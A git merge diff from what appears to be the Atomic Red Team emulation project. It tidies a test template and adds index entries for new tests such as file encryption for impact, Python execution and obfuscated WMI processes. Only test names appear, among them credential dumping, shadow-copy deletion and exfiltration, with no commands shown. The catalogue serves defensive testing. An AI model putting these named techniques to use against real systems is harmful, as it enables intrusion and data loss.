Merge branch 'master' into T1135_test1_split

atomic_red_team/atomic_test_template.yaml

@@ -15,22 +15,22 @@ atomic_tests:
   input_arguments:
     output_file:
       description: TODO
-      type: todo
+      type: TODO
       default: TODO
 
-  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
+  dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands.
   dependencies: # (optional)
     - description: |
         TODO
-      prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
+      prereq_command: | # Commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the prerequisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
         TODO
-      get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
+      get_prereq_command: | # Commands to meet this prerequisite or a message describing how to meet this prerequisite.
         TODO
 
   executor:
     name: command_prompt
-    elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
-    command: | # these are the actaul attack commands, at least one command must be provided
+    elevation_required: true # Indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false.
+    command: | # These are the actaul attack commands, at least one command must be provided.
+      TODO
+    cleanup_command: | # You can remove the cleanup_command section if there are no cleanup commands.
       TODO
-    cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
-      TODO

atomics/Indexes/Indexes-CSV/index.csv

@@ -256,6 +256,10 @@ credential-access,T1003.002,Security Account Manager,2,Registry parse with pypyk
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
+collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
+collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
+collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
+collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
 collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
@@ -560,6 +564,10 @@ impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
 impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
+impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
+impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
+impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
+impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -685,7 +693,8 @@ discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cf
 discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
 discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
-discovery,T1082,System Information Discovery,10,Environment variables discovery,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
+discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
+discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
@@ -742,6 +751,9 @@ execution,T1059.001,PowerShell,15,ATHPowerShellCommandLineParameter -Command par
 execution,T1059.001,PowerShell,16,ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments,1c0a870f-dc74-49cf-9afc-eccc45e58790,powershell
 execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations,86a43bad-12e3-4e85-b97c-4d5cf25b95c3,powershell
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
+execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
+execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
+execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
 execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -765,6 +777,7 @@ execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Rem
 execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
+execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
 lateral-movement,T1021.003,Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
 lateral-movement,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
 lateral-movement,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -44,6 +44,10 @@ credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-49
 credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
 credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
 credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
+collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
+collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
+collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
+collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
 collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
 collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
 collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
@@ -108,6 +112,10 @@ defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef15
 defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
 defense-evasion,T1070.006,Timestomp,4,Modify file timestamps using reference file,631ea661-d661-44b0-abdb-7a7f3fc08e50,sh
 impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
+impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
+impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
+impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
+impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
 impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
 impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
 impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
@@ -143,6 +151,7 @@ discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86
 discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
 discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
 discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
+discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
 discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh
@@ -160,6 +169,9 @@ execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436
 execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
 execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
 execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
+execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
+execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
+execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh
 execution,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
 execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
 execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -138,6 +138,7 @@ discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a9
 discovery,T1082,System Information Discovery,2,System Information Discovery,edff98ec-0f73-4f63-9890-6b117092aff6,sh
 discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
 discovery,T1082,System Information Discovery,7,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,bash
+discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
 discovery,T1016,System Network Configuration Discovery,8,List macOS Firewall Rules,ff1d8c25-2aa4-4f18-a425-fede4a41ee88,bash
 discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -486,7 +486,7 @@ discovery,T1082,System Information Discovery,1,System Information Discovery,6670
 discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows),85cfbf23-4a1e-4342-8792-007e004b975f,command_prompt
 discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery,224b4daf-db44-404e-b6b2-f4d1f0126ef8,command_prompt
 discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-8d21-0f15822d6370,powershell
-discovery,T1082,System Information Discovery,10,Environment variables discovery,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
+discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
 discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
 discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules,038263cb-00f4-4b0a-98ae-0696c67e1752,command_prompt
 discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt
@@ -574,6 +574,7 @@ execution,T1047,Windows Management Instrumentation,4,WMI Reconnaissance List Rem
 execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3,command_prompt
 execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt
 execution,T1047,Windows Management Instrumentation,7,Create a Process using WMI Query and an Encoded Command,7db7a7f9-9531-4840-9b30-46220135441c,command_prompt
+execution,T1047,Windows Management Instrumentation,8,Create a Process using obfuscated Win32_Process,10447c83-fc38-462a-a936-5102363b1c43,powershell
 exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -505,7 +505,11 @@
 - [T1560 Archive Collected Data](../../T1560/T1560.md)
   - Atomic Test #1: Compress Data for Exfiltration With PowerShell [windows]
 - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
+  - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
+  - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
+  - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
+  - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
 - [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
   - Atomic Test #1: Compress Data for Exfiltration With Rar [windows]
   - Atomic Test #2: Compress Data and lock with password for Exfiltration with winrar [windows]
@@ -1001,7 +1005,11 @@
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
   - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+  - Atomic Test #1: Encrypt files using gpg (Linux) [linux]
+  - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
+  - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
+  - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1178,7 +1186,8 @@
   - Atomic Test #7: Hostname Discovery [linux, macos]
   - Atomic Test #8: Windows MachineGUID Discovery [windows]
   - Atomic Test #9: Griffon Recon [windows]
-  - Atomic Test #10: Environment variables discovery [windows]
+  - Atomic Test #10: Environment variables discovery on windows [windows]
+  - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #1: System Network Configuration Discovery on Windows [windows]
   - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -1341,7 +1350,10 @@
   - Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
   - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
   - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
-- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.006 Python](../../T1059.006/T1059.006.md)
+  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
+  - Atomic Test #2: Execute Python via scripts (Linux) [linux]
+  - Atomic Test #3: Execute Python via Python executables (Linux) [linux]
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]
   - Atomic Test #2: Scheduled task Local [windows]
@@ -1379,6 +1391,7 @@
   - Atomic Test #5: WMI Execute Local Process [windows]
   - Atomic Test #6: WMI Execute Remote Process [windows]
   - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
+  - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
 
 # lateral-movement
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -160,7 +160,11 @@
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1560.002 Archive via Library](../../T1560.002/T1560.002.md)
+  - Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
+  - Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
+  - Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
+  - Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
 - [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
   - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
   - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
@@ -341,7 +345,11 @@
 - T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1485 Data Destruction](../../T1485/T1485.md)
   - Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
-- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
+  - Atomic Test #1: Encrypt files using gpg (Linux) [linux]
+  - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
+  - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
+  - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -424,6 +432,7 @@
   - Atomic Test #4: Linux VM Check via Hardware [linux]
   - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
   - Atomic Test #7: Hostname Discovery [linux, macos]
+  - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
 - [T1049 System Network Connections Discovery](../../T1049/T1049.md)
@@ -592,7 +601,10 @@
 - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1059.006 Python](../../T1059.006/T1059.006.md)
+  - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
+  - Atomic Test #2: Execute Python via scripts (Linux) [linux]
+  - Atomic Test #3: Execute Python via Python executables (Linux) [linux]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -375,6 +375,7 @@
   - Atomic Test #2: System Information Discovery [macos]
   - Atomic Test #3: List OS Information [linux, macos]
   - Atomic Test #7: Hostname Discovery [linux, macos]
+  - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #3: System Network Configuration Discovery [macos, linux]
   - Atomic Test #8: List macOS Firewall Rules [macos]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -870,7 +870,7 @@
   - Atomic Test #6: Hostname Discovery (Windows) [windows]
   - Atomic Test #8: Windows MachineGUID Discovery [windows]
   - Atomic Test #9: Griffon Recon [windows]
-  - Atomic Test #10: Environment variables discovery [windows]
+  - Atomic Test #10: Environment variables discovery on windows [windows]
 - [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
   - Atomic Test #1: System Network Configuration Discovery on Windows [windows]
   - Atomic Test #2: List Windows Firewall Rules [windows]
@@ -1035,6 +1035,7 @@
   - Atomic Test #5: WMI Execute Local Process [windows]
   - Atomic Test #6: WMI Execute Remote Process [windows]
   - Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
+  - Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
 
 # exfiltration
 - [T1020 Automated Exfiltration](../../T1020/T1020.md)

atomics/Indexes/Matrices/linux-matrix.md

@@ -4,14 +4,14 @@
 | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
-| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
